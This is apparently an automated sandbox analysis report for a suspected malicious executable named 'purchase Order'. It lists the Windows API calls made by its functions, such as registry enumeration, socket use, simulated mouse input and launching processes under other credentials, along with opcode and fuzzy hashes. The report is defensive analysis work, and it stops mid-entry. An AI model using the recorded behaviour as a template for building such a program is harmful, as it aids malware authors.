                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                        • String ID:
                                                        • API String ID: 1380811348-0
                                                        • Opcode ID: aadaa85f8d0d213ac62cee2b7043037df22fd33e78f52ca16245cadf03270e42
                                                        • Instruction ID: 1c79e5cb019e46e06564816870c5de5b4170b079b326e448c48e7f93be64ac8b
                                                        • Opcode Fuzzy Hash: aadaa85f8d0d213ac62cee2b7043037df22fd33e78f52ca16245cadf03270e42
                                                        • Instruction Fuzzy Hash: 9B517E715043019FD720EF64C885FAFB7E8EF89754F04492EF98697261EB70AA04DB92
                                                        APIs
                                                          • Part of subcall function 00CA3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CA2BB5,?,?), ref: 00CA3C1D
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CA30AF
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CA30EF
                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00CA3112
                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CA313B
                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CA317E
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00CA318B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                        • String ID:
                                                        • API String ID: 3451389628-0
                                                        • Opcode ID: d6be83e30e03e3ff694b1e11beb2439636197044d6e2ad01e399715e84bc0bdc
                                                        • Instruction ID: f2ca8f9ef6bb6fa869d171d75c4a4c05777cfa6481ce959a27542ee8a315d005
                                                        • Opcode Fuzzy Hash: d6be83e30e03e3ff694b1e11beb2439636197044d6e2ad01e399715e84bc0bdc
                                                        • Instruction Fuzzy Hash: 7C514931104341AFC704EF64C895E6EBBE9FF89304F04492DFA56872A1DB71EA05DB52
                                                        APIs
                                                        • GetMenu.USER32(?), ref: 00CA8540
                                                        • GetMenuItemCount.USER32(00000000), ref: 00CA8577
                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CA859F
                                                        • GetMenuItemID.USER32(?,?), ref: 00CA860E
                                                        • GetSubMenu.USER32(?,?), ref: 00CA861C
                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00CA866D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountMessagePostString
                                                        • String ID:
                                                        • API String ID: 650687236-0
                                                        • Opcode ID: dad8bde575729414f0a3754e01790573ab9280520095ce8a11b27f6111690b61
                                                        • Instruction ID: c3c3a3c439a32c4d6887e0cc07d27f9df4bcd0818d26d16a156c663ceadc4023
                                                        • Opcode Fuzzy Hash: dad8bde575729414f0a3754e01790573ab9280520095ce8a11b27f6111690b61
                                                        • Instruction Fuzzy Hash: 8151BB31E00226AFDB11EFA4C841AAEB7F4FF49314F1044A9F916BB351CB30AE459B94
                                                        APIs
                                                        • _memset.LIBCMT ref: 00C84B10
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C84B5B
                                                        • IsMenu.USER32(00000000), ref: 00C84B7B
                                                        • CreatePopupMenu.USER32 ref: 00C84BAF
                                                        • GetMenuItemCount.USER32(000000FF), ref: 00C84C0D
                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00C84C3E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                        • String ID:
                                                        • API String ID: 3311875123-0
                                                        • Opcode ID: a378deadfcb837046f44bd04429e00c97e68f9d3cc8964a7b9c1f980e1a32e60
                                                        • Instruction ID: 720e89c4e1ade0c070fca6c33f3fad8b7199e69f17535adbecf590c944d0271c
                                                        • Opcode Fuzzy Hash: a378deadfcb837046f44bd04429e00c97e68f9d3cc8964a7b9c1f980e1a32e60
                                                        • Instruction Fuzzy Hash: 3E51D47060130AEFDF28EF64D888BADBBF9BF4431CF144169E4259B291D3709A44CB59
                                                        APIs
                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00CDDC00), ref: 00C98E7C
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C98E89
                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00C98EAD
                                                        • #16.WSOCK32(?,?,00000000,00000000), ref: 00C98EC5
                                                        • _strlen.LIBCMT ref: 00C98EF7
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00C98F6A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_strlenselect
                                                        • String ID:
                                                        • API String ID: 2217125717-0
                                                        • Opcode ID: 801defa4c0da10e01b8b8380b6c7701385e524d423a69d8e3a152859fa29f043
                                                        • Instruction ID: 9bba2df814be9b1e20e6819862254a3daec46a84221c4242b0e0e30108824b6f
                                                        • Opcode Fuzzy Hash: 801defa4c0da10e01b8b8380b6c7701385e524d423a69d8e3a152859fa29f043
                                                        • Instruction Fuzzy Hash: 0641A071900204ABCB14EBA4CD99FAEB7B9EF49314F104669F51A97291DF30EE44DB60
                                                        APIs
                                                          • Part of subcall function 00C5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C5B35F
                                                        • BeginPaint.USER32(?,?,?), ref: 00C5AC2A
                                                        • GetWindowRect.USER32(?,?), ref: 00C5AC8E
                                                        • ScreenToClient.USER32(?,?), ref: 00C5ACAB
                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C5ACBC
                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00C5AD06
                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00CBE673
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                        • String ID:
                                                        • API String ID: 2592858361-0
                                                        • Opcode ID: 37888f9a3d7cb2172af8bdb13636c8ffc4764810dd1014d2d947087c57d95ad2
                                                        • Instruction ID: 4b94215b71f64087c33f2ed5a7c043e5db6a7856b16daadc3f3deef3cb109464
                                                        • Opcode Fuzzy Hash: 37888f9a3d7cb2172af8bdb13636c8ffc4764810dd1014d2d947087c57d95ad2
                                                        • Instruction Fuzzy Hash: 5B41AF74104301AFC710DF25CC84FBA7BF8EB59721F140769F9A9872A1C732A988DB66
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C898D1
                                                          • Part of subcall function 00C5F4EA: std::exception::exception.LIBCMT ref: 00C5F51E
                                                          • Part of subcall function 00C5F4EA: __CxxThrowException@8.LIBCMT ref: 00C5F533
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00C89908
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00C89924
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00C8999E
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00C899B3
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C899D2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 2537439066-0
                                                        • Opcode ID: 03242fd12a6df69ebe3203b83bcd808a9e1d15c7148916abe660c0e5cd66f290
                                                        • Instruction ID: 043a75a2953db307bf80a5588aa07983b50d5e5cdca9882265e6e07cbfd98a15
                                                        • Opcode Fuzzy Hash: 03242fd12a6df69ebe3203b83bcd808a9e1d15c7148916abe660c0e5cd66f290
                                                        • Instruction Fuzzy Hash: 77318F31A00105ABDB10AFA4DC85EAEBB78FF84311B1480B9F905AB246E770DE55DBA5
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00C977F4,?,?,00000000,00000001), ref: 00C99B53
                                                          • Part of subcall function 00C96544: GetWindowRect.USER32(?,?), ref: 00C96557
                                                        • GetDesktopWindow.USER32 ref: 00C99B7D
                                                        • GetWindowRect.USER32(00000000), ref: 00C99B84
                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00C99BB6
                                                          • Part of subcall function 00C87A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00C87AD0
                                                        • GetCursorPos.USER32(?), ref: 00C99BE2
                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C99C44
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                        • String ID:
                                                        • API String ID: 4137160315-0
                                                        • Opcode ID: 0f6d3cfac8a2a66673175abae3827185828bb68018000a6432d0e7b2e70c82e0
                                                        • Instruction ID: f73558c9131cfca4cce8fed2a1a416c85057e16d9335290ccc542f257d7cc10c
                                                        • Opcode Fuzzy Hash: 0f6d3cfac8a2a66673175abae3827185828bb68018000a6432d0e7b2e70c82e0
                                                        • Instruction Fuzzy Hash: C631CFB2104315ABCB20DF58DC49F9AB7E9FF88314F00092AF599E7191DA31EA44CB92
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C7AFAE
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00C7AFB5
                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C7AFC4
                                                        • CloseHandle.KERNEL32(00000004), ref: 00C7AFCF
                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C7AFFE
                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C7B012
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                        • String ID:
                                                        • API String ID: 1413079979-0
                                                        • Opcode ID: 170f0e6621df24e6f009dd29902348cca561b26ec6f5451e7ad6ee8280c46cf6
                                                        • Instruction ID: e11b1644d2978c97b92a3922a73a07ac21909d4e31d3e79f88bf97e4ade7a1c5
                                                        • Opcode Fuzzy Hash: 170f0e6621df24e6f009dd29902348cca561b26ec6f5451e7ad6ee8280c46cf6
                                                        • Instruction Fuzzy Hash: 9921507210520DAFDF028FA8DD09FAE7BA9EF84304F048025FA06A2161C3769E51EB61
                                                        APIs
                                                          • Part of subcall function 00C5AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00C5AFE3
                                                          • Part of subcall function 00C5AF83: SelectObject.GDI32(?,00000000), ref: 00C5AFF2
                                                          • Part of subcall function 00C5AF83: BeginPath.GDI32(?), ref: 00C5B009
                                                          • Part of subcall function 00C5AF83: SelectObject.GDI32(?,00000000), ref: 00C5B033
                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00CAEC20
                                                        • LineTo.GDI32(00000000,00000003,?), ref: 00CAEC34
                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CAEC42
                                                        • LineTo.GDI32(00000000,00000000,?), ref: 00CAEC52
                                                        • EndPath.GDI32(00000000), ref: 00CAEC62
                                                        • StrokePath.GDI32(00000000), ref: 00CAEC72
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                        • String ID:
                                                        • API String ID: 43455801-0
                                                        • Opcode ID: 2b85cf4462319679e0249e32dc98a7df5ed2cc2447aaa5f255f2a539b844e5fa
                                                        • Instruction ID: 39a31c685f819cfd1c8546ce3267c65368c2bb4a708983d1c047e754c507fb8d
                                                        • Opcode Fuzzy Hash: 2b85cf4462319679e0249e32dc98a7df5ed2cc2447aaa5f255f2a539b844e5fa
                                                        • Instruction Fuzzy Hash: 9F110576000149BFEB029F94DD88FEA7FADEB08364F048126FE198A160D7719E55DBA0
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 00C7E1C0
                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C7E1D1
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C7E1D8
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00C7E1E0
                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C7E1F7
                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 00C7E209
                                                          • Part of subcall function 00C79AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00C79A05,00000000,00000000,?,00C79DDB), ref: 00C7A53A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                        • String ID:
                                                        • API String ID: 603618608-0
                                                        • Opcode ID: f03d1c9bcd40202cc744951eb8a81c777fe806e5b2dfdb65d008d4b4e8f8ab6d
                                                        • Instruction ID: 2984f4c4d16b497c4b7c00f800acd78d144fa6ff41e55bac89c9dff6242a3f08
                                                        • Opcode Fuzzy Hash: f03d1c9bcd40202cc744951eb8a81c777fe806e5b2dfdb65d008d4b4e8f8ab6d
                                                        • Instruction Fuzzy Hash: B40184B5A00614BFEB109FA5CC45F5EBFB8EB48351F008066FA09A7291D6709D01CB60
                                                        APIs
                                                        • __init_pointers.LIBCMT ref: 00C67B47
                                                          • Part of subcall function 00C6123A: __initp_misc_winsig.LIBCMT ref: 00C6125E
                                                          • Part of subcall function 00C6123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C67F51
                                                          • Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00C67F65
                                                          • Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00C67F78
                                                          • Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00C67F8B
                                                          • Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00C67F9E
                                                          • Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00C67FB1
                                                          • Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00C67FC4
                                                          • Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00C67FD7
                                                          • Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00C67FEA
                                                          • Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00C67FFD
                                                          • Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00C68010
                                                          • Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00C68023
                                                          • Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00C68036
                                                          • Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00C68049
                                                          • Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00C6805C
                                                          • Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00C6806F
                                                        • __mtinitlocks.LIBCMT ref: 00C67B4C
                                                          • Part of subcall function 00C67E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00CFAC68,00000FA0,?,?,00C67B51,00C65E77,00CF6C70,00000014), ref: 00C67E41
                                                        • __mtterm.LIBCMT ref: 00C67B55
                                                          • Part of subcall function 00C67BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00C67B5A,00C65E77,00CF6C70,00000014), ref: 00C67D3F
                                                          • Part of subcall function 00C67BBD: _free.LIBCMT ref: 00C67D46
                                                          • Part of subcall function 00C67BBD: DeleteCriticalSection.KERNEL32(00CFAC68,?,?,00C67B5A,00C65E77,00CF6C70,00000014), ref: 00C67D68
                                                        • __calloc_crt.LIBCMT ref: 00C67B7A
                                                        • GetCurrentThreadId.KERNEL32 ref: 00C67BA3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                        • String ID:
                                                        • API String ID: 2942034483-0
                                                        • Opcode ID: 8cf974de6d7a41c9269d15b31e7525eb9d2232ebdb77907acf007a4321a4bced
                                                        • Instruction ID: 1330bf5874eed27467c1d49a840b9174cfc389fe207415c3d054409de3c4ac2e
                                                        • Opcode Fuzzy Hash: 8cf974de6d7a41c9269d15b31e7525eb9d2232ebdb77907acf007a4321a4bced
                                                        • Instruction Fuzzy Hash: 8BF0903211D7121EEA387B747CC6B5A27849F41B7CB340FA9F874D51E2FF218941A161
                                                        APIs
                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C4281D
                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C42825
                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C42830
                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C4283B
                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C42843
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4284B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Virtual
                                                        • String ID:
                                                        • API String ID: 4278518827-0
                                                        • Opcode ID: ed0d0a2344d43e4113f479a3a8f31e969977ca30fef62633eb87524c7aef8d25
                                                        • Instruction ID: bdc956c6a37d1682865f4bba3b58c5d1bed550dcc8bcaf355470c634316208b8
                                                        • Opcode Fuzzy Hash: ed0d0a2344d43e4113f479a3a8f31e969977ca30fef62633eb87524c7aef8d25
                                                        • Instruction Fuzzy Hash: E10167B0902B5ABDE3008F6A8C85B56FFA8FF19354F00411BE15C47A42C7F5A864CBE5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 1423608774-0
                                                        • Opcode ID: 4d8b92cd561d32d3d7c3e0e77f36aefebed705fc3f91d4f2370fdeebcfa911e1
                                                        • Instruction ID: f7943956eadc62140b6932983582b7e1de648ee21b7c45329d8f6fe7bb271b13
